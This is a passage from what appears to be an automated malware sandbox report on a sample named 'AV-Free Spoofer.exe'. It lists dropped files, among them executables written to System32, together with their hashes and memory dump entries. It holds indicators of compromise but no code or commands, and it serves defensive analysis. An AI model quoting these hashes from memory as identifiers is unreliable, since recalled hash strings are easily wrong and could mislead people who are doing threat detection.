214d542d7ecff0e94d57f9c7ae3ead47e872d726eda88d2569203a596201e534

SHA512
01fca93e679be7b4486bd46a9c75a40c1129db12dca06f9e116127b4129a53b0fe3f089f3922d997428e43381202dfddf8bb11da109c6cb2e40d5056279e8bd2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_B9A64787409FAA871AF08B23F700BA74

Filesize
402B

MD5
413ad6e8b31486fddac22a12e2eb2185

SHA1
b9e6690c71367c67c1609cf9575bf7a633e4c370

SHA256
8184a70f3be071c13dd0aeb12ed6d37a28ee12304d3d4d8c98f703bb12e536e5

SHA512
712933e333c72bb53acd41b6fe04e30d4a8e38fe341c4e168aa72f7b71d76647958901461b11256b3ce03a3c34f94983fec654d14c7cc756f6114d13867125a4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
0063ba3d98e82fe3e613722bc4fbaca8

SHA1
1ccd5ba00dbb069196d98c4efa8acff33b1d789b

SHA256
c7e1c36c2730c1c0c452b83a4bf42a16b0eb2ae94afb1beeedc5cc79cffd907c

SHA512
6b7d9c0997e5501be033c2b166e4eeb0a0df3425aa8821be5502cca1e3233d6808b22fc7d8f06e19bae58adf0c88230888f1db85dd7f46c4562d10bb48d4c537

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
102646eaba5af48eb5894b5b79a126bb

SHA1
d1dacf00fa47de8ebc19dfd59c8a664bde16565f

SHA256
ee7ff20687c43bd4f205de29b4dabd380503c9276059eced516c6229d966e049

SHA512
23cdf512b67397e7960d4cce463a06a619453548e132fa5c001f803d7d8a36062f94a11c251e33810abc5b98c8fac91e954b6605142fd21f10a3921450f60ec6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{71A0C831-B193-11EF-9BF6-6AE4CEDF004B}.dat

Filesize
5KB

MD5
0b053d76d18cfec394d771570d6ae04e

SHA1
18e4091bac3045d6d8204edb46691381699f174d

SHA256
a6b5aab727f7e935c2fee9435066a5a266aad1c69b5adeee4c240ba072551a67

SHA512
d8b0a60a1fc3cbff8bb2ffa418476a5107e67cc077130e417a171320f465280f1281d98bd0a9710e65120a542534b6403f178286eb6c7b81cdeff4cd4248ea2b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{71A0C831-B193-11EF-9BF6-6AE4CEDF004B}.dat

Filesize
5KB

MD5
abdd2534efcacb4854fa2c9f0441cde8

SHA1
8005cc6bea34201fedced0c47543fe743806800f

SHA256
e1a9a7a9729c43951f84a622397df8023dc5c96eaada8084452c8f33d937b6c5

SHA512
abc3aec8ed874435254efeb99072d5ababfec3d8a7d91576caac647c9a13957cade7c4253852dda8d60537464c384b8eec62bc84c8643f21ff72edf615cd2a90

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active\RecoveryStore.{34B11320-3D40-11EF-880E-F2A3CF4AD94F}.dat

Filesize
3KB

MD5
16ed6592e2dd760983a265007b744b91

SHA1
bff06e04cb8e35301c15674fb6cb1add21b7dc5f

SHA256
088d784e832efd187130800f55d544fed6528d3ff3d5869df7b4cb56983bbfa9

SHA512
dc369ea039857f4bfe76b8f98947a2f3c49e3bfa3408ba68c944477b7840e1a3e091295fdaeeb4930b889eb1407965cf9868e97fa38f9ecb53d9856e358c4e23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\0qn8gcy\imagestore.dat

Filesize
21KB

MD5
b61d595092586851a8ed876c1399287c

SHA1
0fe3fbd3862239d3a358cb9b019da9b90dfcdb24

SHA256
d703f40376b3dbbce38924d2a838b5d8753539feab253013a06c22d490bb2727

SHA512
8f8daeb22caa34907d7e83e21719ec6b0e06c9042d8b73d34acf2cad86540609a55a9e043c78731617d14435a4afce6708edec82d9976c9472161d335cfd2cab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\0qn8gcy\imagestore.dat

Filesize
46KB

MD5
36836d7494257bc133bc1a0cd6085f5d

SHA1
f3f9c138f0d469dab54e111f4d4244b7da2968e1

SHA256
ccab7daaea9009eced51f9f0cf22af080e8fe7796886e261ae093a7470d9ac14

SHA512
4cdc2017a3e69ededd76942711136bb24dce4cf10bc45c4a3d486877d0c2ff974f645e7908af9a1a8b7a285006d1bcfa4a129378b4e7e35babd45d6beecb0dd8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\0qn8gcy\imagestore.dat

Filesize
46KB

MD5
564a5affdb7be43f744b1da270868b24

SHA1
6486ce03fe6edc090478b426c39cc41d854080f7

SHA256
41fa8a06365cd9ccef45c08f2389ccc57f755648a416db9b25379ed9d257c22b

SHA512
f60c879fb0d5cfb24f5280402cd0610129e260d16ad18ddf2badabd99ac607c6de099a8b1d0f369b8e9da30a91ff7a03da020e1f4f47ca35c30e11c2979d95fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LPQ313RR\favicon[1].htm

Filesize
16KB

MD5
4878019297349279d3082c0c50b5a57d

SHA1
dd18313329d3c5078d62273ddb3088cccb9adf41

SHA256
2ea41ae5a718aabd84683a79c13a39cd5d834bde5cd7a5d5f382e86a0694fec7

SHA512
3ae121a949c3725dcba5e12379195ec619c6d5ed2f67ba2b3f41d459e34a36b7abb03ba29108cb96bd7f7e4cffbec95e78b0059085792a4817b84a888ebd3cc8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LPQ313RR\favicon[1].ico

Filesize
23KB

MD5
ec2c34cadd4b5f4594415127380a85e6

SHA1
e7e129270da0153510ef04a148d08702b980b679

SHA256
128e20b3b15c65dd470cb9d0dc8fe10e2ff9f72fac99ee621b01a391ef6b81c7

SHA512
c1997779ff5d0f74a7fbb359606dab83439c143fbdb52025495bdc3a7cb87188085eaf12cc434cbf63b3f8da5417c8a03f2e64f751c0a63508e4412ea4e7425c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\1[1].png

Filesize
21KB

MD5
3438cd6aa5cefa64d978baa395706b80

SHA1
054400066b1467c064a6d2790b5f90d1096f17a2

SHA256
2b73e4949a71e929a7dca6c3d2b1f713e35ab54ecaee817ebc20c89452ab0bf8

SHA512
fffce94e7fb7cc0806e1a13c8b2a4885a37b970ca0fa3fd5b4f3049fbbe049f135a51ba6f15b05047be2e5b5b3f128f73930c0a3d505418b63e8fc56c73a604f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO42861BE7\AV-Free Spoofer.exe

Filesize
8.8MB

MD5
68556bb788eaa9c7de0747c3d2e159d5

SHA1
37e091d40a131208861a73f65fedd76f146e8ca5

SHA256
fdeca4d71794459a4f4d84e6a33b9042be323e5ce91859a75dbd409e56d52007

SHA512
3e6d365aec3487d509208f8f21887b0e4aa54c6cead6aa5619279fc64cf4b9153fde1b39e988da0d2ac1a29f012fe304159b8c4224f8268d1875d323141daa3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO42861BE7\NULL

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabE8AC.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarEC05.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\~DFB3E5FDDB5C50F5BD.TMP

Filesize
16KB

MD5
ce906e833704e371dc8ce4ac4d2377ca

SHA1
b82d37ed98c2cdfed70a3a3752074a82f1c61823

SHA256
3a422091d2b1aa48900bd13f0e5afa1e9240894ca9db138f936574c6c75f9f90

SHA512
3568fb171dca4ef3b86994451ea87ec73b74e8ad9037c86c458e55be183c2fe4bc5ab9ddd366e7f51bb3fc2662548493fa2e43d8d4b34ebda3f5a2c32fa7f453

Download Submit
C:\Users\Admin\AppData\Local\Temp\~DFDD02C7ECE48E4B3A.TMP

Filesize
16KB

MD5
086b1a06f4d4caa21a0de6ba3c13f607

SHA1
b3bab72586c8c3868a3d364c7d5da4f9831600bc

SHA256
6fea91f9283195fd598bdb21a23c5c28d04bf3e173240c89996ef79a5f0bb786

SHA512
b9d15611d4463a210334cf6932e9f45e0f94a0669c394df49e0fe600e3bc396cf33cb9bfe027b5bd689ee58747423ef8d598cc5a87722836e3a4361c939b670a

Download Submit
\Windows\System32\applecleaner.exe

Filesize
3.6MB

MD5
f96eb2236970fb3ea97101b923af4228

SHA1
e0eed80f1054acbf5389a7b8860a4503dd3e184a

SHA256
46fe5192387d3f897a134d29c069ebf39c72094c892134d2f0e77b12b11a6172

SHA512
2fd2d28c5f571d40b43a4dd7a22d367ba42420c29627f21ca0a2052070ffb9f689d80dad638238189eed26ed19af626f47e70f1207e10007041c620dac323cc7

Download Submit
\Windows\System32\mp.exe

Filesize
143KB

MD5
ba5ae17c22a0db85f2508c721ec9327c

SHA1
3e503dcc18b82f03d32720349441389793f292a2

SHA256
58bd3ec2ddf1536a5f85d4d6c1d9d68f1e5608acb28acb9637602ab571337717

SHA512
87df7cdac3402fc3264ad6af9821f15800173866adcb00c08aa384b20e4234ac103a1fb9d846f6e03737c9e716779402882fb734488d7c6aa14676c47d81b10a

Download Submit
memory/1960-1309-0x000000013FC70000-0x0000000140612000-memory.dmp

Filesize
9.6MB

Download
memory/1960-760-0x000000013FC70000-0x0000000140612000-memory.dmp

Filesize
9.6MB

Download
memory/1960-761-0x000000013FC70000-0x0000000140612000-memory.dmp

Filesize
9.6MB

Download
memory/1960-759-0x000000013FC70000-0x0000000140612000-memory.dmp

Filesize
9.6MB

Download
memory/1960-762-0x000000013FC70000-0x0000000140612000-memory.dmp

Filesize
9.6MB

Download
memory/1960-763-0x000000013FC70000-0x0000000140612000-memory.dmp

Filesize
9.6MB

Download
memory/2756-19-0x0000000140000000-0x000000014114F000-memory.dmp

Filesize
17.3MB

Download
memory/2756-18-0x0000000077C30000-0x0000000077C32000-memory.dmp

Filesize
8KB

Download
memory/2756-16-0x0000000077C30000-0x0000000077C32000-memory.dmp

Filesize
8KB

Download
memory/2756-14-0x0000000077C30000-0x0000000077C32000-memory.dmp

Filesize
8KB

Download
memory/2756-13-0x0000000077C00000-0x0000000077C02000-memory.dmp

Filesize
8KB

Download
memory/2756-9-0x0000000077C00000-0x0000000077C02000-memory.dmp

Filesize
8KB

Download
memory/2756-11-0x0000000077C00000-0x0000000077C02000-memory.dmp

Filesize
8KB

Download
memory/2904-1308-0x000000013FC70000-0x0000000140612000-memory.dmp

Filesize
9.6MB

Download
memory/2904-757-0x000000013FC70000-0x0000000140612000-memory.dmp

Filesize
9.6MB

Download